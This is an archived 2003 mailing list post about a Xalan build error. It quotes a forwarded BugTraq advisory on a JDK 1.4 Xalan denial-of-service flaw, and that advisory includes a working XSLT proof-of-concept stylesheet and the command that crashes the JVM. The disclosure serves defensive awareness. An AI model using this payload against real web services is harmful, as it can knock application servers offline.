[Opensource] Interesting Read....

Maurizio Brilli mbrilli at tiscali.it
Fri Sep 19 01:38:36 PDT 2003 

Hi Mike,

it looks like I'm the one who gets funny things out of cvs building...

Right about Xalan, yesterday I was trying to build the eforum package 
from  cvs download  (I used the "build-all" target), but I  was stopped 
at the "xmldocs" target with the following error message:

     [java] Exception in thread "main" java.lang.ClassCastException: 
org.apache.xalan.res.XSLTErrorResources_it
     [java]     at org.apache.xalan.xslt.Process.main(Process.java:209)
 
By a quick search in the Internet, the problem seems to be connected to 
the old Xalan version distributed with the J2SDK 1.4, but ant shouldn't 
take that library from there, as I've downloaded also the "libs" package 
from cvs... BTW, I read somewhere that there is a chance of upgrading 
the J2SDK libraries by adding an "endorsed" directory to $JAVA_HOME/lib 
and putting there the new jars, but even this has been no use...

Any hints?
Thank you very much
Ciao
Maurizio

Michael Rimov ha scritto:

> Hey All,
>
> For those of you that may think I'm nuts by always including the 
> latest Xalan release rather than relying on the ones that are just 
> included in the 1.4 JDK's.  This is something that was originally 
> posted to the BugTraq mailing list today.  My [sometimes irritating] 
> habits have paid off ;)
>
> Cheers! :)
>                                 -Mike
>
> -----------------------------------------------------------------------------
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> ILLEGALACCESS.ORG JAVA SECURITY ANNOUNCEMENT
> - 
> --------------------------------------------------------------------------
>
> PACKAGE   : Embedded XALAN packages in JDK 1.4.x
> SUMMARY   : Vulnerable classes callable via user injectable xsl template
> THREAT    : denial of service
> DATE      : 2003-09-17 18:09:00
> ID        : IAC200309-02
> VERSIONS  : JKD 1.4.x
> Author    : Marc Schoenefeld, marc at beauchamp.de
> - 
> -------------------------------------------------------------------------
>
>
> Hi Bugtraq,
>
> ten days ago I submitted a bug to the Sun Bug database about
> an Apache XALAN problem that causes a JVM crash when parsing
> XML/XSLT data in JDK 1.4.1/1.4.2 on Linux and Windows.
> The problem is the possibility that the methods of internal sun.*
> classes can be made visible via an xslt namespace and used
> in xslt programs. Some of the sun.* classes are native
> and therefore are vulnerable to bad parameter passing. A well known
> method that is vulnerable in almost all jdk versions
> in sun.misc.MessageUtils.toStdout with a passed null object.
> These vulnerabilities have been demonstrated by illegalaccess.org
> at several blackhat conferences and are well known to Sun since
> october 2002.
>
> Till today (one week after vendor contact) I got no qualified response
> from SUN about their attitude towards the criticality and moreover the 
> plans
> to fix the bug. To speed things up, I now decided to release the
> bug to BUGTRAQ.
>
> The technique used become a dangerous thing when such an xml/xslt
> combination can be supplied from the user to a web application or java 
> web
> service, which then causes a jvm crash and DoSing the whole java process,
> which is in worst case the application server or web server.
>
> Cheers
> Marc
>
> Command:
>
> c:\java\1.4.2\00\jre\bin\java org.apache.xalan.xslt.Process -IN a.xml 
> -xsl
> sunexploit.xsl
>
>
> Used Files:
>
> ===================a.xml===========================
> (a/)
> ===================a.xml===========================
>
>
> ===========sunexploit.xsl=============================
> (!-- XSLT JDK-Exploit by Marc Schoenefeld , marc at at@illegalaccess.org --)
> (xsl:stylesheet version="1.0"
>    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
>                xmlns:sun="sun")
>                (xsl:template match="/")
>                (xsl:variable name="tmp"
> select="sun:misc.MessageUtils.toStdout(null)"/)
>                (xsl:variable name="tmp2"
> select="sun:misc.MessageUtils.toStdout($tmp)"/)
>                (xsl:value-of select="$tmp2" /)
>                (/xsl:template)
> (/xsl:stylesheet)
> ===========sunexploit.xsl=============================
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.6 (AIX)
> Comment: For info see http://www.gnupg.org
>
> iD8DBQE/aMbGqCaQvrKNUNQRApb9AJ4qHOUXaxvGcGia3SpBVw/yyHCcUACfQJOf
> 7oLpfjBEYtgTNzm6zu24Ul8=
> =nOba
> -----END PGP SIGNATURE-----
>
>
> _______________________________________________
> Opensource mailing list
> Opensource at jcorporate.com
> http://mail.jcorporate.com/mailman/listinfo/opensource
> Archives: http://mail.jcorporate.com/pipermail/opensource/
>

More information about the Opensource mailing list